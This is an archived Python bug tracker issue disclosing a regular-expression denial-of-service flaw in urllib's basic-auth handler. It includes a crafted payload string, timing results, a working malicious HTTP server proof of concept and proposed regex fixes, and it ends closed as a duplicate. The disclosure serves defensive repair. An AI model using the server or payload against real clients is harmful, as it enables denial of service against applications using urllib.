This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

classification
Title: Regular Expression Denial of Service in urllib.request.AbstractBasicAuthHandler
Type: security Stage: resolved
Components: Library (Lib) Versions: Python 3.9, Python 3.8, Python 3.7, Python 3.6, Python 3.5, Python 2.7
process
Status: closed Resolution: duplicate
Dependencies: Superseder: [security][CVE-2020-8492] Denial of service in urllib.request.AbstractBasicAuthHandler
View: 39503
Assigned To: Nosy List: Anselmo Melo, bc, mgorny, mrabarnett, vstinner, xtreak
Priority: normal Keywords:

Created on 2019-11-17 01:45 by bc, last changed 2022-04-11 14:59 by admin. This issue is now closed.

Messages (5)
msg356785 - (view) Author: Ben Caller (bc) * Date: 2019-11-17 01:45
The regular expression urllib.request.AbstractBasicAuthHandler.rx is vulnerable to malicious inputs which cause denial of service (REDoS).

The regex is:

    rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
                    'realm=(["\']?)([^"\']*)\\2', re.I)

The first line can act like:

    (,*,)*(,+)[ \t]

Showing that there are many different ways to match a long sequence of commas.

Input from the WWW-Authenticate or Proxy-Authenticate headers of HTTP responses will reach the regex via the http_error_auth_reqed method as long as the header value starts with "basic ".

We can craft a malicious input:

    urllib.request.AbstractBasicAuthHandler.rx.search(
        "basic " + ("," * 100) + "A"
    )

Which causes catastrophic backtracking and takes a large amount of CPU time to process.

I tested the length of time (seconds) to complete for different numbers of commas in the string:

18   0.289
19   0.57
20   1.14
21   2.29
22   4.55
23   9.17
24  18.3
25  36.5
26  75.1
27 167

Showing an exponential relationship O(2^x) !

The maximum length of comma string that can fit in a response header is 65509, which would take my computer just 6E+19706 years to complete.

Example malicious server:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_basic_auth(n_commas):
        commas = "," * n_commas
        return f"basic {commas}A"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(401)
            n_commas = (
                int(self.path[1:])
                if len(self.path) > 1 else
                65509
            )
            value = make_basic_auth(n_commas)
            self.send_header("www-authenticate", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

Vulnerable client:

    import urllib.request
    opener = urllib.request.build_opener(urllib.request.HTTPBasicAuthHandler())
    opener.open("http://localhost:44020/")

As such, python applications using urllib.request may need to be careful not to visit malicious servers.

I think the regex can be replaced with:
    rx = re.compile('basic[ \t]+realm=(["\']?)([^"\']*)\\2', re.I)

- Ben
msg356787 - (view) Author: Karthikeyan Singaravelan (xtreak) * (Python committer) Date: 2019-11-17 02:27
Thanks for the report. Please report security issues to security@python.org so that the security team can analyze and triage it to be made public. More information at https://www.python.org/news/security/
msg356800 - (view) Author: Ben Caller (bc) * Date: 2019-11-17 11:18
I have been advised that DoS issues can be added to the public bug tracker  since there is no privilege escalation, but should still have the security label.
msg363269 - (view) Author: Matthew Barnett (mrabarnett) * (Python triager) Date: 2020-03-03 16:01
A smaller change to the regex would be to replace the "(?:.*,)*" with "(?:[^,]*,)*".

I'd also suggest using a raw string instead:

rx = re.compile(r'''(?:[^,]*,)*[ \t]*([^ \t]+)[ \t]+realm=(["']?)([^"']*)\2''', re.I)
msg364995 - (view) Author: STINNER Victor (vstinner) * (Python committer) Date: 2020-03-25 16:19
This issue is a duplicate of bpo-39503 which has a PR. Thanks Ben Caller for the report, I credited you in my fix ;-)
History
Date User Action Args
2022-04-11 14:59:23adminsetgithub: 83007
2020-03-25 16:19:39vstinnersetstatus: open -> closed

superseder: [security][CVE-2020-8492] Denial of service in urllib.request.AbstractBasicAuthHandler

nosy: + vstinner
messages: + msg364995
resolution: duplicate
stage: resolved
2020-03-03 16:01:15mrabarnettsetnosy: + mrabarnett
messages: + msg363269
2020-03-02 09:23:25mgornysetnosy: + mgorny
2020-02-04 18:41:33Anselmo Melosetnosy: + Anselmo Melo
2019-11-17 11:18:26bcsetmessages: + msg356800
2019-11-17 02:27:41xtreaksetnosy: + xtreak
messages: + msg356787
2019-11-17 01:45:42bccreate